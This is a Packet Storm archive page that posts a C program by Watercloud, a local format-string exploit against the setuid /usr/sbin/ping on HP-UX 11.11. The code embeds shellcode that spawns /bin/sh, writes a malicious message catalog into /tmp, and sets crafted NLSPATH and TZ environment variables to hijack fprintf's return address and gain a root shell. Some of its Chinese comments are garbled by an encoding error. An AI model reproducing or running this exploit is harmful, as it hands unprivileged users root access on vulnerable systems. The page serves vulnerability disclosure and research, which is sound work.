what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

x_hpux_11i_nls_ping.c

x_hpux_11i_nls_ping.c
Posted Sep 29, 2004
Authored by Watercloud | Site xfocus.org

Local format string exploit for /usr/sbin/ping under HP-UX.

tags | exploit, local
systems | hpux
SHA-256 | 61a2363dd060c8177bf52b47dc06b4540cf1587f6845ea99052c44d06cb31e22

x_hpux_11i_nls_ping.c

Change Mirror Download
/*********************************************************************************************
* Name : x_hpux_11i_nls_ping.c
* Usage : cc x_hpux_11i_nls_ping.c -o x_ping ; ./x_ping
* Purpose :
* HP-UX±¾µØÓïÑÔϵͳ¸ñʽ»¯´®Â©¶´Õë¶Ô/usr/sbin/pingµÄÀûÓóÌÐò£¬±¾µØÓû§¿ÉÒÔͨ¹ýËüÈ¡µÃrootÌØȨ¡£
* Get local rootshell from /usr/sbin/ping using HPUX location language format string bug.
* Author : watercloud
* Date : 2003-1-4
* Tested : On HP-UX B11.11
* Note : Use as your risk!
* Other : ĿǰΪֹHP»¹Ã»ÓÐÏà¹ØµÄ²¹¶¡. Now there is no patch from HP.
*********************************************************************************************/
#include<stdio.h>

#define PATH "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin"
#define TERM "TERM=xterm"
#define NLSPATH "NLSPATH=/tmp/.ex.cat"

#define CMD "/usr/sbin/ping abc_ "
#define MSG "\$set 1\n2 "
#define PRT_ARG_NUM 1 /* xprintf([x1],[x2],"fm" . .) x1 and x2 all exists eq 3 */
#define STACK_LEN 0x140 /* The space of caller-fprintf to main function stack offset */

#define ENV_BEGIN 0x40 /* Our buffer put in TZ ENV's begin address */
#define ENV_LEN 0x40 /* Our env len */
#define LOW_STACK 0x210 /* Our's main stack begin addr, for all program because our env len :) */

char buffer[512];
char buff[72]=
"\x0b\x5a\x02\x9a\x34\x16\x03\xe8\x20\x20\x08\x01\xe4\x20\xe0\x08"
"\x96\xd6\x04\x16\xeb\x5f\x1f\xfd\x0b\x39\x02\x99\xb7\x5a\x40\x22"
"\x0f\x40\x12\x0e\x20\x20\x08\x01\xe4\x20\xe0\x08\xb4\x16\x70\x16"
"/bin/shA";
int * pint = (int *) &buff[56];
unsigned int haddr = 0; /* heigh 16 bit of stack address */
unsigned int dstaddr = 0; /* fprintf's return addr store here */

int main(argc,argv,env)
int argc;char ** argv;char **env;
{
unsigned int * pa = (unsigned int*)env;
FILE * fp = NULL;
int xnum = (LOW_STACK - ENV_BEGIN + STACK_LEN -56 -12 -36 -PRT_ARG_NUM*4)/4; /* the number of %.8x */
int alig1= ENV_BEGIN - xnum*8;
int alig2=0;
int i=0;

while(*pa != NULL) /* clean all env */
*pa++=0;

if(strlen(CMD) >ENV_BEGIN-3)
{
printf("No enough space to alig our env!\n");
exit(1);
}

haddr = (unsigned int)&fp & 0xffff0000;
if(alig1 < 0)
alig1+=0x10000;
alig2 = (haddr >> 16) - alig1 -xnum*8 ;
if(alig2 < 0)
alig2+=0x10000;

dstaddr= haddr+ LOW_STACK + STACK_LEN -24; /* fprintf's return addr stored here */
*pint++=dstaddr;
*pint++=dstaddr;
*pint++=dstaddr;
*pint = 0;

/* begin to make our .cat file */
fp = fopen("/tmp/.ex.k","w");
if(fp == NULL)
{
printf("open file : /tmp/.ex.k for write error.\n");
exit(1);
}
fprintf(fp,"%s",MSG);
for(;i<xnum;i++)
fprintf(fp,"%%.8x");
fprintf(fp,"%%.%ix%%n",alig1);
fprintf(fp,"%%.%ix%%hn",alig2);
fclose(fp);
fp = NULL;
system("/usr/bin/gencat /tmp/.ex.cat /tmp/.ex.k");
unlink("/tmp/.ex.k");
/* end make our .cat file */

/* put our env,store our shellcode and address info . . . and so on */
sprintf(buffer,"TZ=%*s%s%*s",ENV_BEGIN-3-strlen(CMD),"A",buff,ENV_BEGIN+ENV_LEN-strlen(buff),"B");
putenv(buffer);
putenv(PATH);
putenv(TERM);
putenv(NLSPATH);

printf("¼ÇµÃɾ³ýÕâ¸öÁÙʱÎļþ(Remember to delete the file): /tmp/.ex.cat .\n");
execl("/usr/sbin/ping","/usr/sbin/ping","abc_",0); /* ºÃÏ·¿ªÊ¼ÁË £º£© */
}
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    15 Files
  • 28
    Jun 28th
    14 Files
  • 29
    Jun 29th
    11 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close